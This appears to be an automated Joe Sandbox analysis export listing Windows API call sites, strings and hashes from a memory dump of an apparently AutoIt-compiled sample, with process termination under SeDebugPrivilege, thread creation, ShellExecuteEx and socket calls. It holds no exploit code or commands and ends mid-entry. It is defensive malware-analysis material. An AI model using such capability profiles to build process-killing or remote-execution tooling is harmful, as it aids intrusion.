• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0102853C,00000B00,?,?), ref: 0102892A
• HeapAlloc.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 01028931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0102853C,00000B00,?,?), ref: 01028946
• GetCurrentProcess.KERNEL32(?,00000000,?,0102853C,00000B00,?,?), ref: 0102894E
• DuplicateHandle.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 01028951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0102853C,00000B00,?,?), ref: 01028961
• GetCurrentProcess.KERNEL32(0102853C,00000000,?,0102853C,00000B00,?,?), ref: 01028969
• DuplicateHandle.KERNEL32(00000000,?,0102853C,00000B00,?,?), ref: 0102896C
• CreateThread.KERNEL32(00000000,00000000,01028992,00000000,00000000,00000000), ref: 01028986
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
APIs
  • Part of subcall function 0102710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?,?,01027455), ref: 01027127
  • Part of subcall function 0102710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027142
  • Part of subcall function 0102710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027150
  • Part of subcall function 0102710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?), ref: 01027160
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01049806
• _memset.LIBCMT ref: 01049813
• _memset.LIBCMT ref: 01049956
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01049982
• CoTaskMemFree.OLE32(?), ref: 0104998D
Strings
• NULL Pointer assignment, xrefs: 010499DB
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01056E24
• SendMessageW.USER32(?,00001036,00000000,?), ref: 01056E38
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01056E52
• _wcscat.LIBCMT ref: 01056EAD
• SendMessageW.USER32(?,00001057,00000000,?), ref: 01056EC4
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 01056EF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat
                                                                    • String ID: SysListView32
                                                                    • API String ID: 307300125-78025650
                                                                    • Opcode ID: 602b4b16253ad1d756cc0e473053dc49aecc29e8f5eafc030d974c84b8f01ed4
                                                                    • Instruction ID: 5dd860c67c00879a3e52313bd5215fe0ac0e420b92da30000d10e3f4da78e8a0
                                                                    • Opcode Fuzzy Hash: 602b4b16253ad1d756cc0e473053dc49aecc29e8f5eafc030d974c84b8f01ed4
                                                                    • Instruction Fuzzy Hash: F341A370900349ABEB619F68CC45BEF77E9EF08350F50046AF9C497191D6769984CB60
                                                                    APIs
                                                                      • Part of subcall function 01033C55: CreateToolhelp32Snapshot.KERNEL32 ref: 01033C7A
                                                                      • Part of subcall function 01033C55: Process32FirstW.KERNEL32(00000000,?), ref: 01033C88
                                                                      • Part of subcall function 01033C55: CloseHandle.KERNEL32(00000000), ref: 01033D52
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0104E9A4
                                                                    • GetLastError.KERNEL32 ref: 0104E9B7
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0104E9E6
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0104EA63
                                                                    • GetLastError.KERNEL32(00000000), ref: 0104EA6E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0104EAA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: 07036f79ba27721a30a28d95be100212a5fd6c1797eef6fa9a1989df6b6fda3c
                                                                    • Instruction ID: 6668dc5ad36f655dac17d3cdf3bf83c8c075e5f40d15566c96dd77d2e2697cc6
                                                                    • Opcode Fuzzy Hash: 07036f79ba27721a30a28d95be100212a5fd6c1797eef6fa9a1989df6b6fda3c
                                                                    • Instruction Fuzzy Hash: A041AC702042019FDB21EF54CC94F6EBBA5BF80714F088459F9829B3C2CBB9A814DB91
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 01033033
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 8700a3b795317d258e1adadcd1eae4daf7df308a45a4b65dc5b31bbfcfaedec6
                                                                    • Instruction ID: 5c85fa966a1aceb86f144f148f1f986c9a6024e541f9a00df29eeed629812376
                                                                    • Opcode Fuzzy Hash: 8700a3b795317d258e1adadcd1eae4daf7df308a45a4b65dc5b31bbfcfaedec6
                                                                    • Instruction Fuzzy Hash: 5F112B3534C34ABEE7159A59DCD2C6FBBDCAF55320B10406AFA80AE182DB755A4056A0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01034312
                                                                    • LoadStringW.USER32(00000000), ref: 01034319
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0103432F
                                                                    • LoadStringW.USER32(00000000), ref: 01034336
                                                                    • _wprintf.LIBCMT ref: 0103435C
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0103437A
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 01034357
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 3648134473-3128320259
                                                                    • Opcode ID: 350b8be224b9220bc52fe645e4722d1d5020843c655aef1a8a4b6189a9e32a49
                                                                    • Instruction ID: f08482e0275acc221b7c5effc7a3da2f3358f4bdc438e22ff796e574b0b22e57
                                                                    • Opcode Fuzzy Hash: 350b8be224b9220bc52fe645e4722d1d5020843c655aef1a8a4b6189a9e32a49
                                                                    • Instruction Fuzzy Hash: E00162F2900309BFE761ABA4DD89EFB776CEB08200F404595BB85E6005EA7D5E854B74
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0105D47C
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0105D49C
                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0105D6D7
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0105D6F5
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0105D716
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0105D735
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0105D75A
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0105D77D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                    • String ID:
                                                                    • API String ID: 1211466189-0
                                                                    • Opcode ID: 2f4789f7a0a14ed6a609ffe12303bafff3db7bb86eda16902f1127358c6565c5
                                                                    • Instruction ID: 26a5b0b235c8815c23b15a2f6130cb94c212c354b479b67704fb47d40c79201e
                                                                    • Opcode Fuzzy Hash: 2f4789f7a0a14ed6a609ffe12303bafff3db7bb86eda16902f1127358c6565c5
                                                                    • Instruction Fuzzy Hash: 2DB19D71500219EBDF94CFA8C5857AE7BF1FF08701F0480AAED889F299E735A950CB60
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0104FDEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharConnectRegistryUpper_memmove
                                                                    • String ID:
                                                                    • API String ID: 3479070676-0
                                                                    • Opcode ID: 5eb2837b8fdf1dc29cf82dfb5408832fa6ccdbf5ded5b957c7cde43527d1ffa5
                                                                    • Instruction ID: 34522cbedcfa490bde3c70ce137d0df605226b28ca7d9559e0e7e012a644c1d9
                                                                    • Opcode Fuzzy Hash: 5eb2837b8fdf1dc29cf82dfb5408832fa6ccdbf5ded5b957c7cde43527d1ffa5
                                                                    • Instruction Fuzzy Hash: D7A18D712042029FDB10EF18C894F6EBBE5AF85314F08885DF9968B292DB79E945DF42
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 00FD2ACF
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00FD2B17
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 0100C21A
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 0100C286
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 1fcf1c9cfd519bb81035f8d78a8f711b86fe6dcce52524e46a73f23ffbcf17f0
                                                                    • Instruction ID: 915719e7844dfe76929f84c03c893c2da92b74f3710856fc725086621cac5395
                                                                    • Opcode Fuzzy Hash: 1fcf1c9cfd519bb81035f8d78a8f711b86fe6dcce52524e46a73f23ffbcf17f0
                                                                    • Instruction Fuzzy Hash: 3C41FD317087809AE7B65B288D88B6B7B93FBA5310F5C854BE18786790C67E9841F790
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 010370DD
                                                                      • Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                      • Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 01037114
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 01037130
                                                                    • _memmove.LIBCMT ref: 0103717E
                                                                    • _memmove.LIBCMT ref: 0103719B
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 010371AA
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 010371BF
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 010371DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 256516436-0
                                                                    • Opcode ID: ad39d9f9a1996e2db0b5b227f1dbdcae6e8a9867bf78f19d334b3850943641c2
                                                                    • Instruction ID: 925195b4e83c94d8e58495f847d79ac48a4f74d0e55678610d1eae5a49b9fe5e
                                                                    • Opcode Fuzzy Hash: ad39d9f9a1996e2db0b5b227f1dbdcae6e8a9867bf78f19d334b3850943641c2
                                                                    • Instruction Fuzzy Hash: 1831A376900206EBCF10DFA8DC859AFBBB9EF45310F1440A5EA449B256DB399A10DB60
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 010561EB
                                                                    • GetDC.USER32(00000000), ref: 010561F3
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010561FE
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0105620A
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01056246
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01056257
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0105902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01056291
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010562B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: a2cf56f1dcef5aac9f64cf8832768b6c6df0d4f2a0964fc6b99bf6828a7268b4
                                                                    • Instruction ID: 92ce285cf8fb2e0cb5ea39b3f612e6da27df7a9e0b74231c061d610fc85d2d00
                                                                    • Opcode Fuzzy Hash: a2cf56f1dcef5aac9f64cf8832768b6c6df0d4f2a0964fc6b99bf6828a7268b4
                                                                    • Instruction Fuzzy Hash: 11319F721002107FEB218F64CC8AFEB3FA9EF49761F040055FE88DA191C67A9841CB74
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: ec16b1931cde2cf7747c4c0626e3c5bcc0b54bca747e1ab0aba686e699129290
                                                                    • Instruction ID: 7a33d955e3797514b2ba63eb5af1cb990132d630ca8e6f2db2ba2cff51c13717
                                                                    • Opcode Fuzzy Hash: ec16b1931cde2cf7747c4c0626e3c5bcc0b54bca747e1ab0aba686e699129290
                                                                    • Instruction Fuzzy Hash: 9E215B7170122EBBE215B6169D42FFF779CAE61368F084024FF849B647EB68DE10C1A5
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                      • Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9
                                                                    • _wcstok.LIBCMT ref: 0103EC94
                                                                    • _wcscpy.LIBCMT ref: 0103ED23
                                                                    • _memset.LIBCMT ref: 0103ED56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 774024439-3081909835
                                                                    • Opcode ID: 961ae336a7777dcc38f8aada80e564cd3f0ae5e620df09f5fb2facea08da6fa1
                                                                    • Instruction ID: 6f67105a132224d6eb6a7fb4a09a26bbe7b294d20df9f9e435675b56f3eac345
                                                                    • Opcode Fuzzy Hash: 961ae336a7777dcc38f8aada80e564cd3f0ae5e620df09f5fb2facea08da6fa1
                                                                    • Instruction Fuzzy Hash: CBC18D315083019FC754FF68C885A6EB7E5AF85310F08496EF9D99B3A2DB74E805DB82
                                                                    APIs
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01046C00
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01046C21
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01046C34
                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 01046CEA
                                                                    • inet_ntoa.WSOCK32(?), ref: 01046CA7
                                                                      • Part of subcall function 0102A7E9: _strlen.LIBCMT ref: 0102A7F3
                                                                      • Part of subcall function 0102A7E9: _memmove.LIBCMT ref: 0102A815
                                                                    • _strlen.LIBCMT ref: 01046D44
                                                                    • _memmove.LIBCMT ref: 01046DAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 3619996494-0
                                                                    • Opcode ID: c334884ad77a2db2ea17562559c37c184c464cd626967b4805c96f6c1f970931
                                                                    • Instruction ID: 500e81da729ad1ece2c40255a82091390eafe8b5d9c6db7e4157835949a9c598
                                                                    • Opcode Fuzzy Hash: c334884ad77a2db2ea17562559c37c184c464cd626967b4805c96f6c1f970931
                                                                    • Instruction Fuzzy Hash: 4B8100B1508300ABC710FB68CC81E6FB7E9AF85714F04492EF9859B292EB75ED45C792
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7401265f8ce060daf911d7774785de9027c82f67982f84e138bea707a8be9af2
                                                                    • Instruction ID: 0a8294fc1c8b76e07f143c871f0853a203f688a243c6977612456e1b3fec0412
                                                                    • Opcode Fuzzy Hash: 7401265f8ce060daf911d7774785de9027c82f67982f84e138bea707a8be9af2
                                                                    • Instruction Fuzzy Hash: A1716E35900109FFDB15CF98CC48ABE7B79FF86314F28824AF955AB251C7349A51DB60
                                                                    APIs
                                                                    • IsWindow.USER32(01516A70), ref: 0105B3EB
                                                                    • IsWindowEnabled.USER32(01516A70), ref: 0105B3F7
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0105B4DB
                                                                    • SendMessageW.USER32(01516A70,000000B0,?,?), ref: 0105B512
                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0105B54F
                                                                    • GetWindowLongW.USER32(01516A70,000000EC), ref: 0105B571
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0105B589
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    • Opcode ID: aabd42853ce8917db53e1c1254f98edeb96aaada244d7ccdc15640abed308dcd
                                                                    • Instruction ID: 2786d198689f279fda07ecbc2bccc462c6ba9fdf79ff1d7ef7e3ba32fd9affe4
                                                                    • Opcode Fuzzy Hash: aabd42853ce8917db53e1c1254f98edeb96aaada244d7ccdc15640abed308dcd
                                                                    • Instruction Fuzzy Hash: CF715E34604205AFEFB59E59C894BABBFE6FF09300F144099EEC597252CB36B941DB50
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0104F448
                                                                    • _memset.LIBCMT ref: 0104F511
                                                                    • ShellExecuteExW.SHELL32(?), ref: 0104F556
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                      • Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9
                                                                    • GetProcessId.KERNEL32(00000000), ref: 0104F5CD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0104F5FC
                                                                    Strings
                                                                    Memory Dump Source
